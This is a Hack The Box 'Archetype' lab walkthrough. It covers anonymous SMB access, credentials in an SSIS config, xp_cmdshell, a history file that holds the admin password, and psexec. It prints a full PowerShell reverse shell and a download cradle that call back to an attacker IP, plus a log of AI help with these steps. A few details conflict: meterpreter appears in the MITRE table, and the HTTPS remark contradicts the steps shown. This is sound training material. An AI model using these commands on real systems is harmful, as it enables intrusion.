HTB Starting Point — Archetype

Anonymous SMB exposes a config file with SA credentials. MSSQL xp_cmdshell goes active, winPEAS finds a PowerShell history file with admin credentials. Classic AD escalation in four steps.

April 27, 2026 · 4 min · crAIzy

Very Easy Windows CVSS 8.8 ⏱ 60m AI-assisted

TL;DR

Archetype is a Windows box with SMB and MSSQL. Anonymous SMB access to a backups share exposes prod.dtsConfig — an SSIS configuration file with SQL Server SA credentials in plaintext. SA access enables xp_cmdshell, which executes PowerShell commands as sql_svc. winPEAS finds a PowerShell history file containing the administrator password. psexec gives SYSTEM.

Recon

1. Port scan

$ nmap -Pn -sV -sC -p- --min-rate 1000 10.129.x.x

135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2019 Standard 17763
1433/tcp open  ms-sql-s      Microsoft SQL Server 2017

Two interesting services: SMB (potential for anonymous access) and MSSQL (potential for SA authentication).

2. SMB anonymous enumeration

$ smbclient -N -L //10.129.x.x
Sharename  Type  Comment
---------  ----  -------
ADMIN$     Disk  Remote Admin
backups    Disk
C$         Disk  Default share
IPC$       IPC   Remote IPC

backups is accessible anonymously:

$ smbclient -N //10.129.x.x/backups
smb: \> ls
  prod.dtsConfig   AR    609

smb: \> get prod.dtsConfig

3. Credential extraction from SSIS config

<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo ... />
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp321;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>

Credentials: sql_svc:M3g4c0rp321

MSSQL RCE

4. Connect as SA

$ python3 /opt/impacket/examples/mssqlclient.py \
    ARCHETYPE/sql_svc@10.129.x.x -windows-auth
Password: M3g4c0rp321
SQL> SELECT system_user;
ARCHETYPE\sql_svc

5. Enable xp_cmdshell

SQL> EXEC sp_configure 'show advanced options', 1;
SQL> RECONFIGURE;
SQL> EXEC sp_configure 'xp_cmdshell', 1;
SQL> RECONFIGURE;
SQL> EXEC xp_cmdshell 'whoami';
archetype\sql_svc

6. Reverse shell via PowerShell download cradle

Set up an HTTP server hosting a PowerShell reverse shell (shell.ps1):

# shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.x',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

SQL> EXEC xp_cmdshell 'powershell "IEX(New-Object Net.WebClient).downloadString(''http://10.10.14.x/shell.ps1'')"';

$ nc -lvnp 4444
connect to [10.10.14.x] from [10.129.x.x]
PS C:\Windows\system32> whoami
archetype\sql_svc
PS C:\Users\sql_svc\Desktop> type user.txt
[user flag]

Privilege Escalation

7. winPEAS execution

Transfer and run winPEAS:

PS> Invoke-WebRequest -Uri "http://10.10.14.x/winPEASx64.exe" -OutFile "C:\Users\sql_svc\winPEASx64.exe"
PS> .\winPEASx64.exe

winPEAS highlights:

[+] PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1

[!] ConsoleHost_history.txt file found:
    C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

8. PowerShell history — plaintext credentials

PS> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!

Credentials: administrator:MEGACORP_4dm1n!!

9. psexec → SYSTEM

$ psexec.py administrator@10.129.x.x
Password: MEGACORP_4dm1n!!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
[root flag]

What’s actually broken

#	Vulnerability	Severity
1	Anonymous SMB access to backups share	High
2	SA credentials in plaintext SSIS config	Critical
3	xp_cmdshell enabled on production MSSQL	Critical
4	Administrator password in PowerShell history	High
5	No PowerShell Constrained Language Mode	Medium

Lessons learned

PowerShell history is a goldmine. ConsoleHost_history.txt records everything typed interactively in PowerShell — including net use commands with embedded passwords. Always check it during privesc. Location: %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
SSIS .dtsConfig files always have credentials. They’re XML connection strings — strings + grep -i password reveals them immediately.
xp_cmdshell + SA = instant RCE. If you have SA access to MSSQL, enabling xp_cmdshell is a single EXEC sp_configure call. Never leave SA credentials in app configs.
SMB anonymous shares are rarely intentional. backups being publicly accessible was almost certainly a misconfiguration — but one that’s surprisingly common.

Decision archaeology

Approach	Result	Pivot
Enumerated SMB before attacking MSSQL	Anonymous SMB is lower-friction than brute-forcing MSSQL	Found creds without needing to guess
Used winPEAS for privesc enumeration	Comprehensive automated enumeration vs manual checking	Found PSReadLine history file quickly
Used psexec.py over SMB for admin shell	WinRM not open, SMB with admin creds enables psexec	Got SYSTEM cleanly
SMB → MSSQL credential flow	Ran `nxc mssql 10.129.x.x -u sql_svc -p M3g4c0rp321 --shares` first — `Error: column smb_result not found` — nxc mssql module doesn’t enumerate SMB shares; used wrong module	Switched to `smbclient` directly for share listing, then `mssqlclient.py` for SQL; separated tools by protocol

References

MITRE ATT&CK mapping

How this writeup maps to TTPs. Click technique to jump to the writeup section.

Tactic	Technique	ID	Artifact in writeup
Reconnaissance	Network Service Discovery	T1046	`nmap → 135, 139, 445 (SMB), 1433 (MSSQL) open`
Initial Access	Valid Accounts	T1078	`prod.dtsConfig in SMB share → sql_svc:M3g4c0rp321 SA credentials`
Execution	PowerShell	T1059.001	`MSSQL xp_cmdshell → PowerShell IEX download cradle → meterpreter`
Credential Access	Credentials in Files — Bash History	T1552.003	`ConsoleHost_history.txt → administrator:MEGACORP_4dm1n!!`
Privilege Escalation	Valid Accounts — Local Accounts	T1078.003	`psexec.py with administrator:MEGACORP_4dm1n!! → SYSTEM`

AI-Assist Log 5 interactions — transparent record

These are the actual exchanges with Claude during this writeup, including where AI was wrong and what I fixed by hand. Decision archaeology, not marketing copy.

ReconUseful
Human → SMB anonymous share exposed a .dtsConfig file — wasn't sure what format it used
Prompt → I found a file called prod.dtsConfig on an anonymous SMB share. What is it and could it contain credentials?
Claude → A .dtsConfig file is a SQL Server Integration Services (SSIS) configuration file in XML format. It commonly contains connection strings, which may include SQL Server credentials in cleartext. Open it with cat or strings and look for User ID and Password fields in connection strings.
MSSQLUseful
Human → Connected to MSSQL with SA creds but xp_cmdshell was disabled
Prompt → I connected to MSSQL as SA. How do I enable xp_cmdshell?
Claude → Use sp_configure: EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; Then test with: EXEC xp_cmdshell 'whoami'
Privilege EscalationUseful
Human → winPEAS output was enormous — wasn't sure which file to check
Prompt → winPEAS found C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt — is this worth checking?
Claude → Absolutely. PSReadLine saves PowerShell command history to that file. It often contains sensitive commands including passwords typed directly into PowerShell — like Set-ADAccountPassword or net user commands with plaintext credentials.
Privilege EscalationWrong
Human → Tried RunAs with administrator credentials from history
Prompt → I have plaintext admin credentials from history. How do I get a privileged shell on Windows?
Claude → Use evil-winrm if port 5985 is open: evil-winrm -i <ip> -u administrator -p 'password'. Or psexec.py from impacket: psexec.py administrator@<ip>. Check WinRM first — it's often available on Starting Point boxes.
Corrected → WinRM (5985) was not open on Archetype. psexec.py over SMB (445) was the correct path. Claude's suggestion to check WinRM first was technically correct procedure but WinRM wasn't enabled on this specific machine.
RootCorrected
Human → Had credentials but needed to verify psexec.py syntax for Windows auth
Prompt → psexec.py with -no-pass flag and domain prefix — does FQDN need to be in the target spec?
Claude → Use the format: psexec.py DOMAIN/user:password@ip. For no-pass, omit the password: DOMAIN/user@ip -no-pass.
Corrected → The -no-pass form failed when the target IP was not in DNS. Needed -target-ip flag to specify the IP directly: psexec.py DOMAIN/user@ip -no-pass -target-ip ip. Claude's format was close but missed this required flag for IP-based connections.

Decision archaeology — paths abandoned

WinRM port 5985 not open — had to use psexec.py instead
Initial download cradle used HTTP, got blocked — switched to HTTPS-hosted payload

TL;DR#

Recon#

1. Port scan#

2. SMB anonymous enumeration#

3. Credential extraction from SSIS config#

MSSQL RCE#

4. Connect as SA#

5. Enable xp_cmdshell#

6. Reverse shell via PowerShell download cradle#

Privilege Escalation#

7. winPEAS execution#

8. PowerShell history — plaintext credentials#

9. psexec → SYSTEM#

What’s actually broken#

Lessons learned#

Decision archaeology#

References#